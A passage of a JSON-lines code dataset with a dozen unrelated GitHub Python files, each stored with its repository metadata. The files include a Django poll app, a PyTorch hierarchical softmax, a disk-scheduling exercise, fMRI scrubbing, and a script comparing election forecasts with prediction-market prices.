(f' ({int(time.time()) - self.__start_time}s)'\r\n if self.__start_time is not None and self.show_timer\r\n else '')\r\n self.__frame = f'\\033[0;90m\\033[1;97m{self.__frame}\\033[0m'\r\n # Write the current frame, then jump to start of line.\r\n sys.__stdout__.write(\"\\033[s\")\r\n sys.__stdout__.write(self.__frame)\r\n sys.__stdout__.write(\"\\033[u\")\r\n # Flush output to prevent flickering.\r\n sys.__stdout__.flush()\r\n\r\n # Wait for next frame.\r\n self.__rendering = False\r\n\r\n def __spin(self):\r\n while self.__thread is not None:\r\n if self.__rendering:\r\n continue\r\n\r\n self.__render_frame()\r\n\r\n time.sleep(self.refresh_interval_ms / 1000)\r\n\r\n def stop(self) -> int:\r\n if self.__thread is None:\r\n return -1\r\n\r\n thread = self.__thread\r\n self.__thread = None\r\n thread.join()\r\n\r\n runtime = int(time.time()) - self.__start_time\r\n self.__start_time = None\r\n\r\n # Clear existing frame and return to start.\r\n sys.__stdout__.flush()\r\n\r\n # Restore standard output.\r\n if sys.stdout is not sys.__stdout__:\r\n sys.stdout = sys.__stdout__\r\n if sys.stderr is not sys.__stderr__:\r\n sys.stderr = sys.__stderr__\r\n\r\n if self.__frame is not None:\r\n self.__erase_line()\r\n sys.__stdout__.flush()\r\n\r\n # Flush any remaining proxied output\r\n self.__flush_proxy(proxy=self.__stdout_proxy, stream=sys.__stdout__)\r\n self.__flush_proxy(proxy=self.__stderr_proxy, stream=sys.__stderr__)\r\n\r\n # Return elapsed time (seconds).\r\n return runtime\r\n\r\n def get_proxy(self, stream):\r\n if stream == sys.__stdout__:\r\n return self.__stdout_proxy\r\n elif stream == sys.__stderr__:\r\n return self.__stderr_proxy\r\n return None\r\n\r\n @staticmethod\r\n def __flush_proxy(proxy: SysioProxy, stream: TextIOWrapper):\r\n if proxy is not None and proxy.tell() > 0:\r\n value = proxy.getvalue()\r\n\r\n proxy.seek(0)\r\n proxy.truncate(0)\r\n\r\n stream.write(value)\r\n stream.flush()\r\n\r\n def __erase_line(self):\r\n sys.__stdout__.write('\\033[K')\r\n sys.__stdout__.write('\\b' * self.__frame_length())\r\n sys.__stdout__.write(' ' * self.__frame_length())\r\n sys.__stdout__.write('\\b' * self.__frame_length())\r\n\r\n def __frame_length(self) -> int:\r\n ansi_escape = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ -/]*[@-~]')\r\n ansi_escapes_length = (len(self.__frame) - len(ansi_escape.sub('', self.__frame)))\r\n\r\n return max(len(self.__frame) - ansi_escapes_length, 0)\r\n\r\n\r\ndef load_while(execute: Callable, **kwargs):\r\n loader = Loader(**kwargs).start()\r\n result = execute()\r\n loader.stop()\r\n return result\r\n","repo_name":"SamJakob/thornhill","sub_path":"scripts/hotreload/src/utils/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"25768203282","text":"import time\nimport gc\nimport torch\nimport math\nimport albumentations as A\nimport numpy as np\n\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n# from torchsummary import summary\n# from torchmetrics import PeakSignalNoiseRatio\nfrom skimage import color\nfrom skimage.metrics import structural_similarity\n\nfrom Utils import load_checkpoint\nfrom Dataset import ABDataset\nfrom Model import Generator\n\ngc.collect()\ntorch.cuda.empty_cache()\n\ndataset_name = \"EyeQ\" # \"EyeQ\" \"Mendeley\"\n\npath = \"Results\"\ncheckpoint = \"Results/genb.pth.tar\"\nsave_path = f\"Results/Testing {dataset_name}\"\nTEST_DIR = f\"datasets/{dataset_name}/test\"\n\n\ndef masking(a, b):\n l_top = l_bottom = 0\n a = a[0]\n b = b[0]\n\n for i in range(a.shape[1]):\n if torch.sum(a[:, i, :]) != 0:\n break\n l_top += 1\n\n for i in range(a.shape[1]):\n if torch.sum(a[:, a.shape[1] - i - 1, :]) != 0:\n break\n l_bottom += 1\n\n b[:, :l_top, :] = 0\n b[:, b.shape[1] - l_bottom:, :] = 0\n\n return a, b\n\n\ndef PSNR_SSIM(orig_img, gen_img):\n gray_orig_img = color.rgb2gray(orig_img)\n gray_gen_img = color.rgb2gray(gen_img)\n\n mse = np.mean((gray_orig_img - gray_gen_img) ** 2)\n if mse == 0:\n psnr = 100\n else:\n max_pixel = 1.0\n psnr = 20 * math.log10(max_pixel / math.sqrt(mse))\n\n ssim = structural_similarity(gray_orig_img, gray_gen_img, multichannel=False, data_range=1.0)\n\n return round(psnr, 3), round(ssim, 3)\n\norig_img, gen_img = \"real_0.png\", \"fake_0.png\"\npsnr, ssim = PSNR_SSIM(orig_img, gen_img)\nprint(psnr, ssim)\n\n","repo_name":"Jayc-Z/derain","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34310370913","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\n\nfrom .models import Choice, Question\n\n\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')\n context = {'latest_question_list': latest_question_list}\n return render(request, 'poll/index', context)\n\n # to:LEARN add pagination\n\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'poll/results', {'question': question})\n\n\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'poll/vote', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('poll:results', args=(question.id,)))\n","repo_name":"aahnik/django-polling-site","sub_path":"pollsite/poll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"39335758896","text":"import re\nfrom datetime import datetime\n\nimport pandas as pd\nimport requests\n\n_FORECAST_EXPRESSION = '_deluxe'\n_MIN_PROFIT_PER_SHARE = 0.075\n_SIDES = ('buy', 'sell')\n_FTE_BASE_URL = 'https://projects.fivethirtyeight.com/2022-general-election-forecast-data/'\n_CHAMBERS = dict(\n names=['senate', 'governor'],\n patterns=dict(\n senate='Which party will win the ([A-Z]{2}) (Sen)ate race',\n governor='Which party will win ([A-Z]{2}) (gov)ernor\\'s race?',\n ),\n filenames=dict(\n senate='senate_state_toplines_2022.csv',\n governor='governor_state_toplines_2022.csv',\n ),\n)\n\n\ndef _get_pi_contracts(market: dict, contract: dict) -> dict:\n contract_data = dict((f'm{market_field}', market[market_field]) for market_field in ('shortName', 'url'))\n contract_data.update(dict((f'c{contract_field}', contract[contract_field]) for contract_field in (\n 'name', 'bestBuyYesCost', 'bestBuyNoCost', 'bestSellYesCost', 'bestSellNoCost')))\n return contract_data\n\n\ndef _get_pi_markets(markets: dict) -> pd.DataFrame:\n market_data = []\n for market in markets['markets']:\n market_data.extend(_get_pi_contracts(market, contract) for contract in market['contracts'])\n return pd.DataFrame(market_data).drop_duplicates()\n\n\ndef get_pi_data() -> pd.DataFrame:\n markets = requests.get('https://www.predictit.org/api/marketdata/all/').json()\n return _get_pi_markets(markets)\n\n\ndef _filter_pi_data(pi_data: pd.DataFrame, chamber: str) -> pd.DataFrame:\n pattern = _CHAMBERS['patterns'][chamber]\n pi_data = pi_data.rename(columns=dict((i, i.replace('cbest', 'best')) for i in pi_data.columns))\n shortname_with_pattern = pi_data.mshortName.apply(lambda x: re.search(pattern, x))\n pi_data['state'] = shortname_with_pattern.apply(lambda x: x.group(1) if x else None)\n pi_data['seat'] = shortname_with_pattern.apply(lambda x: '-'.join(x.groups()).upper() if x else None)\n return pi_data\n\n\ndef _get_fte_data(chamber: str) -> pd.DataFrame:\n filename = _CHAMBERS['filenames'][chamber]\n fte = pd.read_csv(_FTE_BASE_URL + filename, usecols=['district', 'expression', 'winner_Dparty', 'winner_Rparty'])\n fte = fte[fte.expression == _FORECAST_EXPRESSION].drop_duplicates(keep='first', subset='district')\n fte['state'] = fte.district.apply(lambda x: x.split('-', 1)[0])\n fte = fte.drop(columns=['expression', 'district'])\n return fte\n\n\ndef merge_fte_and_pi(pi_data: pd.DataFrame, chamber: str) -> pd.DataFrame:\n chamber = chamber.lower()\n pi = _filter_pi_data(pi_data, chamber)\n pi = pi[pi.state.notna()].copy()\n fte = _get_fte_data(chamber)\n\n _separate_by_party = lambda party: pi[pi.cname == party].drop(columns='cname')\n pi = _separate_by_party('Democratic').merge(_separate_by_party('Republican'), on=[\n 'mshortName', 'murl', 'state', 'seat'], suffixes=('D', 'R'))\n\n merged = pi.merge(fte, on='state').drop(columns=['state']).rename(columns=dict(\n winner_Dparty='fteD', winner_Rparty='fteR'))\n return merged\n\n\ndef add_profit_columns(merged: pd.DataFrame) -> None:\n merged['profit_bestBuyYesCostD'] = merged.fteD - merged.bestBuyYesCostD\n merged['profit_bestBuyNoCostR'] = merged.fteD - merged.bestBuyNoCostR\n merged['profit_bestBuyYesCostR'] = merged.fteR - merged.bestBuyYesCostR\n merged['profit_bestBuyNoCostD'] = merged.fteR - merged.bestBuyNoCostD\n\n merged['profit_bestSellYesCostD'] = merged.bestSellYesCostD - merged.fteD\n merged['profit_bestSellNoCostR'] = merged.bestSellNoCostR - merged.fteD\n merged['profit_bestSellYesCostR'] = merged.bestSellYesCostR - merged.fteR\n merged['profit_bestSellNoCostD'] = merged.bestSellNoCostD - merged.fteR\n\n\ndef add_action_columns(merged: pd.DataFrame, side: str) -> pd.DataFrame:\n cost_columns = list(map(lambda x: x.format(side.title()), (\n 'best{}YesCostD', 'best{}NoCostR', 'best{}YesCostR', 'best{}NoCostD')))\n merged = merged.reset_index(drop=True)\n transposed = merged[[f'profit_{i}' for i in cost_columns]].transpose()\n addnl = [{\n 'actionRec': re.search('profit_best(Buy|Sell)(Yes|No)Cost([DR])', transposed[i].idxmax()),\n 'actionProfit': transposed[i].max(),\n } for i in transposed]\n\n merged = merged.join(pd.DataFrame(addnl))\n merged.actionRec = merged.actionRec.apply(lambda x: x.groups()).apply(\n lambda x: '{} {} on the {}'.format(x[0], x[1], dict(D='Democrat', R='Republican')[x[2]]))\n merged['actionSide'] = side\n return merged\n\n\ndef create_fte_and_pi_comparison() -> pd.DataFrame:\n pi_data = get_pi_data()\n merged = pd.concat(merge_fte_and_pi(pi_data, chamber) for chamber in _CHAMBERS['names'])\n add_profit_columns(merged)\n merged = pd.concat(add_action_columns(merged, side) for side in _SIDES)\n merged = merged[merged.actionProfit >= _MIN_PROFIT_PER_SHARE].copy()\n\n merged.fteD = merged.fteD.round(2)\n merged.fteR = merged.fteR.round(2)\n merged.actionProfit = merged.actionProfit.round(2)\n\n merged = pd.concat(\n merged[merged.actionSide == side].sort_values('actionProfit', ascending=False) for side in _SIDES)\n return merged\n\n\ndef create_html_page(merged: pd.DataFrame) -> None:\n summary = merged.groupby('actionRec', as_index=False).agg(dict(murl='count', seat=', '.join)).sort_values(\n by='murl', ascending=False)\n forecast_exp_title = _FORECAST_EXPRESSION[1:].title()\n\n market_item_template = open('templates/market_item.html').read()\n market_item_costs_template = open('templates/market_item_costs.html').read()\n summary_item_template = open('templates/summary_item.html').read()\n\n items = [\n market_item_template.format(\n forecast_expression=forecast_exp_title,\n costs=market_item_costs_template.format(actionSideTitle=i['actionSide'].title()).format(**i),\n **i,\n ) for i in merged.to_dict('records')\n ]\n items.insert(5, open('templates/notes_item.html').read().format(\n forecast_expression=forecast_exp_title, min_profit_per_share=_MIN_PROFIT_PER_SHARE))\n links_idx = 9\n html = open('templates/page.html').read().format(\n data0='\\n'.join(items[:links_idx]),\n data1='\\n'.join(items[links_idx:]),\n summary='\\n'.join(summary_item_template.format(**i) for i in summary.to_dict('records')),\n update_interval='hourly',\n last_updated=datetime.now().strftime('%d %B %Y %H:%M'),\n )\n with open('index.html', 'w') as f:\n f.write(html)\n\n\ndef create_csv(merged: pd.DataFrame) -> None:\n for col in merged.columns:\n if col.startswith('profit_'):\n merged[col] = merged[col].round(2)\n merged.to_csv('data/opportunities.csv', index=False)\n\n\ndef main():\n merged = create_fte_and_pi_comparison()\n create_html_page(merged)\n create_csv(merged)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dcadata/fivethirtyeight-vs-predictit","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"34717260242","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\nclass HierarchicalSoftmax(nn.Module):\n def __init__(self, ntokens, nhid, ntokens_per_class=None):\n super(HierarchicalSoftmax, self).__init__()\n\n # Parameters\n self.ntokens = ntokens\n self.nhid = nhid\n\n if ntokens_per_class is None:\n ntokens_per_class = int(np.ceil(np.sqrt(ntokens)))\n\n self.ntokens_per_class = ntokens_per_class\n\n self.nclasses = int(np.ceil(self.ntokens * 1. / self.ntokens_per_class))\n self.ntokens_actual = self.nclasses * self.ntokens_per_class\n\n self.layer_top_W = nn.Parameter(torch.FloatTensor(self.nhid, self.nclasses), requires_grad=True)\n self.layer_top_b = nn.Parameter(torch.FloatTensor(self.nclasses), requires_grad=True)\n\n self.layer_bottom_W = nn.Parameter(torch.FloatTensor(self.nclasses, self.nhid, self.ntokens_per_class), requires_grad=True)\n self.layer_bottom_b = nn.Parameter(torch.FloatTensor(self.nclasses, self.ntokens_per_class), requires_grad=True)\n\n self.softmax = nn.Softmax(dim=1)\n\n self.init_weights()\n\n def init_weights(self):\n\n initrange = 0.1\n self.layer_top_W.data.uniform_(-initrange, initrange)\n self.layer_top_b.data.fill_(0)\n self.layer_bottom_W.data.uniform_(-initrange, initrange)\n self.layer_bottom_b.data.fill_(0)\n\n def forward(self, inputs, labels=None):\n\n batch_size, d = inputs.size()\n\n if labels is not None:\n\n label_position_top = labels / self.ntokens_per_class\n label_position_bottom = labels % self.ntokens_per_class\n\n layer_top_logits = torch.matmul(inputs, self.layer_top_W) + self.layer_top_b\n layer_top_probs = self.softmax(layer_top_logits)\n\n layer_bottom_logits = torch.squeeze(torch.bmm(torch.unsqueeze(inputs, dim=1),\n self.layer_bottom_W[label_position_top]), dim=1) + self.layer_bottom_b[label_position_top]\n layer_bottom_probs = self.softmax(layer_bottom_logits)\n\n target_probs = layer_top_probs[torch.arange(batch_size).long(), label_position_top] * layer_bottom_probs[torch.arange(batch_size).long(), label_position_bottom]\n\n return target_probs\n\n else:\n # Remain to be implemented\n layer_top_logits = torch.matmul(inputs, self.layer_top_W) + self.layer_top_b\n layer_top_probs = self.softmax(layer_top_logits)\n\n word_probs = layer_top_probs[:,0] * self.softmax(torch.matmul(inputs, self.layer_bottom_W[0]) + self.layer_bottom_b[0])\n\n for i in range(1, self.nclasses):\n word_probs = torch.cat((word_probs, layer_top_probs[:,i] * self.softmax(torch.matmul(inputs, self.layer_bottom_W[i]) + self.layer_bottom_b[i])), dim=1)\n\n return word_probs\n\n\nloss = HierarchicalSoftmax(10, 300)\ninput = torch.randn(16, 300)\noutput = loss(input)\nprint(output.shape)\n","repo_name":"Bigwode/3-leetcode-everyday","sub_path":"networks/4.cifar/HierarchicalSoftmax.py","file_name":"HierarchicalSoftmax.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"6907184740","text":"# HW5 Task3\n# Po-Han Chen USCID: 3988044558\n# Apr 05 2021\n\n\nimport sys\nimport time\nfrom blackbox import BlackBox\nimport random\n\nif __name__ == \"__main__\":\n random.seed(553)\n # parse command line arguments\n input_path = sys.argv[1]\n stream_size = int(sys.argv[2])\n num_of_asks = int(sys.argv[3])\n output_path = sys.argv[4]\n\n \"\"\"\n Start timer\n \"\"\"\n start_time = time.time()\n bx = BlackBox()\n\n # keep track of the sample\n sample = []\n # keep track of the number of users arrived so far\n n = 0\n # size of the sample\n s = 100\n sequence_string = \"\"\n for _ in range(num_of_asks):\n stream_users = bx.ask(input_path, stream_size)\n if _ > 0:\n for user in stream_users:\n n += 1\n prob_keep = random.random()\n if prob_keep < s/n:\n position = random.randint(0, 99)\n sample[position] = user\n else:\n for user in stream_users:\n sample.append(user)\n n = 100\n sequence_string += str(n) + \",\" + sample[0] + \",\" + sample[20] + \",\" + sample[40] + \",\" + sample[60] + \",\" + sample[80] + \"\\n\"\n res = \"seqnum,0_id,20_id,40_id,60_id,80_id\\n\"\n res += sequence_string\n with open(output_path, \"w\") as out_file:\n out_file.writelines(res)\n print(res)\n \"\"\"\n Stop timer\n \"\"\"\n duration = time.time() - start_time\n print(\"Duration: \" + str(duration))\n","repo_name":"pohann/DSCI553","sub_path":"HW5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"31215186819","text":"# class DiskScheduler:\n# \tdef __init__(self,schedulername):\n# \t\tself.schedulername = schedulername\n# \t\tself.head = None\n# \t\tself.requests = []\n# \tdef __repr__(self):\n# \t\treturn(str(self.schedulername))\n\n# def seek(requests,head):\n# \ttime = 0\n# \tserved = []\n# \tstart = requests.index(head)\n# \tfor i in range(start,len(requests)-1):\n# \t\tst = abs((requests[i+1]-requests[i]))\n# \t\tprint(f\"From {requests[i]} to {requests[i+1]}, seektime:{st}\")\n# \t\tserved += [requests[i]]\n# \t\ttime += st\n# \tremaining = [i for i in requests if i not in served]\n# \tremaining.sort(reverse=True)\n# \tfor i in range(len(remaining)-1):\n# \t\tst = abs((remaining[i+1]-remaining[i]))\n# \t\tprint(f\"From {remaining[i]} to {remaining[i+1]}, seektime:{st}\")\n# \t\tserved += [remaining[i]]\n# \t\ttime += st\n# \tserved.append(remaining[i+1])\n# \treturn ((f\" Seektime: {time}\\n Average Time: {time/len(requests)}\"),served)\n\n\n\n# scheduler = DiskScheduler(\"SCAN\")\n# print(\"Give Request Order\")\n# scheduler.requests += map(int,input().split(','))\n# scheduler.head = int(input(\"Give initial header\"))\n# timeaxis = [i for i in range(len(scheduler.requests)+1)]\n# requestaxis = [scheduler.head] + scheduler.requests\n# requestaxis.sort()\n# time,served = seek(requestaxis,scheduler.head)\n# print(time)\n\ndef SCAN(hp,reqs,num):\n\trequests = reqs.copy()\n\tpos = hp\n\ttime = 0\n\tend=200-1\n\tstart=0\n\tflag=True\n\tfor i in range(pos,end+1):\n\t\tif i in requests:\n\t\t\ttemp=pos\n\t\t\ttime+=abs(pos-i)\n\t\t\tpos=i\n\t\t\tnum=num-1\n\t\t\tprint(\" \",i,\" seeked with seek time \",abs(temp-i))\n\t\t\trequests.remove(i)\n\tif(num!=0):\n\t time+=abs(pos-end)\n\t print(\" \",end,\" seeked with seek time \",abs(pos-end))\n\t pos=end\n\t for i in range(end,start-1,-1):\n\t\t if i in requests:\n\t\t\t temp=pos\n\t\t\t time+=abs(pos-i)\n\t\t\t pos=i\n\t\t\t print(\" \",i,\" seeked with seek time:\",abs(temp-i))\n\t\t\t requests.remove(i)\n\tprint(time)\n\tavg_seek_time = time/n\n\tprint(\"Total time \",time)\n\treturn avg_seek_time\n\nif __name__=='__main__':\n\tprint(\"\\n\\n\\n ********** SCAN *********\\n\\n\\n\")\n\tprint(\"DISK SCHEDULING:\")\n\tprint(\"Provide number of I/O requests\")\n\tn = int(input())\n\tprint(\"Provide initial position of disc arm (total cylinders=200)\")\n\thp = int(input())\n\twhile hp>200:\n\t\tprint(\"!!! INVALID !!! try again\")\n\t\thp = int(input())\t\n\tprint(\"Provide positions to visit : max is 200\")\n\trequests = []\n\tfor i in range(n):\n\t\treq = int(input())\n\t\trequests.append(req)\n\n\tprint(requests)\n\n\tprint(\"Avg seek time for scan was \",\n\t\tSCAN(hp,requests,n))","repo_name":"alphin-roy2000/System-Software-Lab","sub_path":"EXP5/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41923654483","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.comparator_function_parameter_map import ComparatorFunctionParameterMap\n\n\nT = TypeVar(\"T\", bound=\"ComparatorFunction\")\n\n\n@attr.s(auto_attribs=True)\nclass ComparatorFunction:\n \"\"\"\n Attributes:\n function_name (Union[Unset, str]):\n parameter_map (Union[Unset, ComparatorFunctionParameterMap]):\n \"\"\"\n\n function_name: Union[Unset, str] = UNSET\n parameter_map: Union[Unset, \"ComparatorFunctionParameterMap\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n function_name = self.function_name\n parameter_map: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.parameter_map, Unset):\n parameter_map = self.parameter_map.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if function_name is not UNSET:\n field_dict[\"functionName\"] = function_name\n if parameter_map is not UNSET:\n field_dict[\"parameterMap\"] = parameter_map\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.comparator_function_parameter_map import ComparatorFunctionParameterMap\n\n d = src_dict.copy()\n function_name = d.pop(\"functionName\", UNSET)\n\n _parameter_map = d.pop(\"parameterMap\", UNSET)\n parameter_map: Union[Unset, ComparatorFunctionParameterMap]\n if isinstance(_parameter_map, Unset):\n parameter_map = UNSET\n else:\n parameter_map = ComparatorFunctionParameterMap.from_dict(_parameter_map)\n\n comparator_function = cls(\n function_name=function_name,\n parameter_map=parameter_map,\n )\n\n comparator_function.additional_properties = d\n return comparator_function\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"JamesG419/openempi","sub_path":"open-empi-client/open_empi_client/models/comparator_function.py","file_name":"comparator_function.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74483171426","text":"def scrub_vols(infile, qadir, data_dir,\n motfile ,subject, scan):\n\n import numpy as np\n import nibabel as nb\n import os, sys\n from time import sleep\n\n\n print('#####################')\n print('#####################')\n print('#####################')\n\n\n if os.path.isdir(qadir):\n\n #sleep(0.05)\n\n # check if scrubvols.txt exists\n scrub_file = qadir + '/scrubvols.txt'\n\n if os.path.isfile(scrub_file):\n\n print('scrubvols.txt for ' + subject + ' ' + scan + ' exists! perform hd fix & scrubbing')\n\n #load 4d nifti image\n nifti = nb.load(infile)\n img = nb.Nifti1Image(nifti.get_data()[:, :, :, :], nifti.get_affine())\n print(img.header['pixdim'][4])\n img.header['pixdim'][4] = 1.4\n print(img.header['pixdim'][4])\n\n\n #read scrubvols.txt to get volumes that need to be scrubbed (minus 1 because deviant starting point, in python first vol = 0)\n with open(scrub_file) as f:\n vols = f.read().splitlines()\n vols_array = np.array(list(map(int, vols)))\n vols_array_minus1 = vols_array - 1\n\n #read prefiltered_func_data_mcf.par from feat/mc dir & delete volumes from realignment parameter, because they are used to classify motion within ICA AROMA\n with open(motfile) as mopar:\n content_mopar = mopar.read().splitlines()\n content_mopar_array = np.array(content_mopar)\n\n content_mopar = np.delete(content_mopar_array, vols_array_minus1)\n\n #write updated prefiltered_func_data_mcf_scrubbed.par\n mopar_scrubbed = data_dir + '/' + subject + '/preprocessed/functional/' + scan + '.feat/mc/prefiltered_func_data_mcf_scrubbed.par'\n with open(mopar_scrubbed, 'w') as mopar_scrubbed_file:\n mopar_scrubbed_file.write(\"\\n\".join(map(str, content_mopar)))\n mopar_scrubbed_file.close()\n\n #scrub volumes from 4d nifti img\n scrubbed_array = np.delete(img.dataobj, vols_array_minus1, axis=3)\n\n #transform numpy array to nifti object, with the dimensions from the original image\n scrubbed_img = nb.Nifti1Image(scrubbed_array, img.get_affine())\n #scrubbed_img.header['pixdim'][4] = 1.4\n\n # create empty outfile\n tmp = scan + '.feat/'\n out_file = os.path.join(data_dir, subject, 'preprocessed/functional', tmp, 'scrubbed_filtered_func_data.nii.gz')\n\n # assign ts to out_file\n scrubbed_img.to_filename(out_file)\n\n #return out_file\n\n\n else:\n print( 'Nothing to scrub but changing TR-info in header to 1.4 sec for ' + subject + ' ' + scan )\n img = nb.load(infile)\n img.header['pixdim'][4] = 1.4\n #print(img.header['pixdim'][4])\n\n # create empty outfile\n tmp = scan + '.feat/'\n out_file = os.path.join(data_dir, subject, 'preprocessed/functional', tmp, 'filtered_func_data.nii.gz')\n\n # assign ts to out_file\n img.to_filename(out_file)\n\n else:\n sys.exit('QA_dir does not exist!')\n #print('QA_dir does not exist!')\n\n print('#####################')\n print('#####################')\n print('#####################')\n\n\n #return out_file\n\n\n","repo_name":"fBeyer89/RSV_rsanalysis","sub_path":"quality_reports/poldrack_qa/scrub_vols.py","file_name":"scrub_vols.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26352885472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 00:52:17 2019\n\n@author: moskovkina\n\n4. Определить, какое число в массиве встречается чаще всего.\n\"\"\"\nfrom random import randint\n\nn = int(input(\"Введите длинну массива: \"))\nnums = [randint(0, 10) for i in range(n)]\nmax_cnt = 0\nmax_num = 0\nfor i in nums:\n if nums.count(i) > max_cnt:\n max_num = i\n max_cnt = nums.count(i)\n\nprint()\nprint(f'Число {max_num} встречается в массиве чаще всего: {max_cnt} раз(а)')","repo_name":"TataMoskovkina/GeekUniversity","sub_path":"Алгоритмы и структуры данных на Python/HW_3_task_4.py","file_name":"HW_3_task_4.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22199143486","text":"import torch\nfrom torch._subclasses import FakeTensor\nfrom torch.utils._mode_utils import no_dispatch\nimport builtins\nimport warnings\nfrom typing import Callable, Dict, Optional, Union, List\n\n\n_compiler_backend = \"inductor\"\n\n\ndef _get_compiler_backend():\n return _compiler_backend\n\n\ndef _set_compiler_backend(backend=\"inductor\"):\n global _compiler_backend\n _compiler_backend = backend\n\n\ndef compile(\n model: torch.fx.GraphModule,\n example_inputs: List[torch.Tensor],\n mode: Union[str, None] = None,\n options: Optional[Dict[str, Union[str, builtins.int, builtins.bool]]] = None,\n) -> Callable:\n def defake(x):\n if not isinstance(x, FakeTensor):\n return x\n if x._has_symbolic_sizes_strides:\n size = [\n s.node.shape_env.size_hint(s.node.expr)\n if isinstance(s, torch.SymInt)\n else s\n for s in x.size()\n ]\n stride = [\n s.node.shape_env.size_hint(s.node.expr)\n if isinstance(s, torch.SymInt)\n else s\n for s in x.stride()\n ]\n else:\n size = x.size()\n stride = x.stride()\n y = torch.empty_strided(\n size,\n stride,\n dtype=x.dtype,\n device=x.device,\n requires_grad=x.requires_grad,\n )\n y.zero_()\n return y\n\n if _get_compiler_backend() == \"inductor\":\n from .compile_fx import compile_fx\n\n return compile_fx(model, example_inputs, mode, options)\n elif _get_compiler_backend() == \"torchscript\":\n try:\n with no_dispatch():\n real_inputs = list(map(defake, example_inputs))\n with torch.no_grad():\n traced_model = torch.jit.trace(model.eval(), real_inputs)\n traced_model = torch.jit.freeze(traced_model)\n return traced_model\n except Exception:\n warnings.warn(\"JIT trace failed during the IPEX compile process.\")\n return model\n else:\n raise RuntimeError(\n f\"Unexpected compilation path {_get_compiler_backend()} for ipex backend. Supported are 'inductor', 'torchscript'.\"\n )\n","repo_name":"intel/intel-extension-for-pytorch","sub_path":"intel_extension_for_pytorch/_inductor/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":1069,"dataset":"github-code","pt":"70"}
+{"seq_id":"25253122082","text":"import torch\nfrom torch import nn\nfrom FeatureVector import FeatureVector\n\n\nclass EpisodeModule(nn.Module):\n\n def __init__(self, embedding_size, middle_number, num_iterations):\n\n super().__init__()\n\n self.embedding_size = embedding_size\n self.middle_number = middle_number\n self.episode_gru = nn.GRU(\n input_size=embedding_size,\n hidden_size=embedding_size,\n num_layers=1,\n batch_first=True\n )\n self.memory_gru = nn.GRU(\n input_size=embedding_size,\n hidden_size=embedding_size,\n num_layers=1,\n batch_first=True\n )\n\n self.num_iterations = num_iterations\n\n self.g_score = FeatureVector(embedding_size, middle_number)\n\n\n def forward(self, m0, facts, question, h0=0):\n\n m = None\n h = None\n\n e = None\n\n for i in range(self.num_iterations):\n\n if i == 0:\n m = m0\n h = h0\n\n g = self.g_score(facts, m, question)\n\n if isinstance(h, int):\n\n episode_gru_output = self.episode_gru(facts)[1]\n h_new = g * episode_gru_output + (1 - g) * torch.zeros_like(g)\n else:\n h_new = g * self.episode_gru(facts, h)[1] + (1 - g) * h\n h = h_new\n e = h_new\n m = self.memory_gru(m, e)[0]\n\n return 